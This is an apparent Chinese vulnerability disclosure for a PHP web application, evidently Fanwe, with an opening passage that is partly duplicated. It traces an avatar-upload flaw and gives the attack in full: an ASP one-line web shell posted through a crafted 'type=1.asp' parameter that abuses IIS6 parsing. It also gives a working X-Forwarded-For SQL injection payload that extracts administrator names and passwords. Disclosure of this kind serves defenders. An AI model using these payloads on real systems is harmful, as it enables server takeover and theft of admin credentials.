### 简要描述: 。。。 ### 详细说明: save_avatar.php: ``` $_REQUEST['m']="UcModify"; $_REQUEST['a']="save_avatar"; include ROOT_PATH."app/source/index.php"; //进去看看 ``` app/source/index.php: ``` ....沈略....... $ma = strtolower($_REQUEST['m'].'_'.$_REQUEST['a']); switch($ma){ case 'ucmodify_save_avatar': require ROOT_PATH.'app/source/func/com_user_center_func.php'; require ROOT_PATH."app/source/user_center.php"; //关键代码 break; ....沈略....... ``` app/source/user_center.php: ``` user_enter_init (); //会员菜单初始化 $userid = intval ( $_SESSION ['user_id'] ); $ma = $_REQUEST ['m'] . "_" . strtolower ( $_REQUEST ['a'] ); $ma ( $userid ); exit (); function UcModify_save_avatar($userid) { @header("Expires: 0"); @header("Cache-Control: private, post-check=0, pre-check=0, max-age=0", FALSE); @header("Pragma: no-cache"); //这里传过来会有两种类型,一先一后, big和small, 保存成功后返回一个json字串,客户端会再次post下一个. $type = isset($_GET['type'])?trim($_GET['type']):'small';//这里type我们可以控制 $pic_id = $userid; //$orgin_pic_path = $_GET['photoServer'];...
### 简要描述: 。。。 ### 详细说明: save_avatar.php: ``` $_REQUEST['m']="UcModify"; $_REQUEST['a']="save_avatar"; include ROOT_PATH."app/source/index.php"; //进去看看 ``` app/source/index.php: ``` ....沈略....... $ma = strtolower($_REQUEST['m'].'_'.$_REQUEST['a']); switch($ma){ case 'ucmodify_save_avatar': require ROOT_PATH.'app/source/func/com_user_center_func.php'; require ROOT_PATH."app/source/user_center.php"; //关键代码 break; ....沈略....... ``` app/source/user_center.php: ``` user_enter_init (); //会员菜单初始化 $userid = intval ( $_SESSION ['user_id'] ); $ma = $_REQUEST ['m'] . "_" . strtolower ( $_REQUEST ['a'] ); $ma ( $userid ); exit (); function UcModify_save_avatar($userid) { @header("Expires: 0"); @header("Cache-Control: private, post-check=0, pre-check=0, max-age=0", FALSE); @header("Pragma: no-cache"); //这里传过来会有两种类型,一先一后, big和small, 保存成功后返回一个json字串,客户端会再次post下一个. $type = isset($_GET['type'])?trim($_GET['type']):'small';//这里type我们可以控制 $pic_id = $userid; //$orgin_pic_path = $_GET['photoServer']; //原始图片地址,备用. //$from = $_GET['from']; //原始图片地址,备用. if (! is_dir ( ROOT_PATH . 'Publichttps://images.seebug.org/upload/avatar/avatar_'.$type ))//创建目录 利用iis6解析漏洞 可以执行代码 mkdir ( ROOT_PATH . 'Publichttps://images.seebug.org/upload/avatar/avatar_'.$type); //生成图片存放路径 $new_avatar_path = 'avatar_'.$type.'/'.$pic_id.'.jpg'; //将POST过来的二进制数据直接写入图片文件. @file_put_contents(ROOT_PATH.'Publichttps://images.seebug.org/upload/avatar/'.$new_avatar_path,file_get_contents("php://input")); //原始图片比较大,压缩一下. 效果还是很明显的, 使用80%的压缩率肉眼基本没有什么区别 //小图片 不压缩约6K, 压缩后 2K, 大图片约 50K, 压缩后 10K $avtar_img = imagecreatefromjpeg(ROOT_PATH.'Publichttps://images.seebug.org/upload/avatar/'.$new_avatar_path); imagejpeg($avtar_img,ROOT_PATH.'Publichttps://images.seebug.org/upload/avatar/'.$new_avatar_path,80); //nix系统下有必要时可以使用 chmod($filename,$permissions); //输出新保存的图片位置, 测试时注意改一下域名路径, 后面的statusText是成功提示信息. //status 为1 是成功上传,否则为失败. $d = new pic_data(); //$d->data->urls[0] = 'http://sns.com/avatar_test/'.$new_avatar_path; $d->data->urls[0] = '/Publichttps://images.seebug.org/upload/avatar/'.$new_avatar_path; $d->status = 1; $d->statusText = a_L('UPLOAD_SUCCESS'); $msg = json_encode($d); echo $msg; } ``` 登陆状态 保存头像 自定义目录 用iis解析漏洞 执行恶意代码 www.xx.cm/save_avatar.php?type=1.asp post提交数据 <%execute(request("xiaoma"))%> [<img src="https://images.seebug.org/upload/201404/18205543c0395ea3de4d31af386da04c4d05731f.png" alt="pe.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/18205543c0395ea3de4d31af386da04c4d05731f.png) ------------------------------------------------------------ 还有个就是 或者X-Forwarded-For导致的注射 先看下getIP函数咋写的 ``` function getIP() { static $realip; if (isset($_SERVER)){ if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])){ //我们可以直接伪造的 $realip = $_SERVER["HTTP_X_FORWARDED_FOR"]; } else if (isset($_SERVER["HTTP_CLIENT_IP"])) { $realip = $_SERVER["HTTP_CLIENT_IP"]; } else { $realip = $_SERVER["REMOTE_ADDR"]; } } else { if (getenv("HTTP_X_FORWARDED_FOR")){ $realip = getenv("HTTP_X_FORWARDED_FOR"); } else if (getenv("HTTP_CLIENT_IP")) { $realip = getenv("HTTP_CLIENT_IP"); } else { $realip = getenv("REMOTE_ADDR"); } } return $realip; } ``` 我们再看谁使用了这个getIP函数 app/source/user_init.php 这个是程序开始就加载了的文件 ``` $client_ip = $iplocation->getIP(); $_SESSION['CLIENT_IP'] = $client_ip; //把获取到的ip存入session中 ``` 在登录中又 使用了这个变量导致注射 app/source/index.php ``` $sql_str = 'update ' . DB_PREFIX . 'user set last_ip = \'' . $_SESSION ['CLIENT_IP'] . '\',active_sn = \'\',group_id= ' . intval ( $userinfo ['group_id'] ) . ' where id = ' . intval ( $userinfo ['id'] ); ``` [<img src="https://images.seebug.org/upload/201404/182217358caaaf6d83136f7762ae0477d81e4509.jpg" alt="w.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/182217358caaaf6d83136f7762ae0477d81e4509.jpg) exp: 127.0.0.13'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT SUBSTRING(CONCAT(adm_name,0x7c,adm_pwd,0x7c),1,60) FROM fanwe_admin LIMIT 0,1),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a),active_sn = ' ### 漏洞证明: [<img src="https://images.seebug.org/upload/201404/182217358caaaf6d83136f7762ae0477d81e4509.jpg" alt="w.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/182217358caaaf6d83136f7762ae0477d81e4509.jpg)
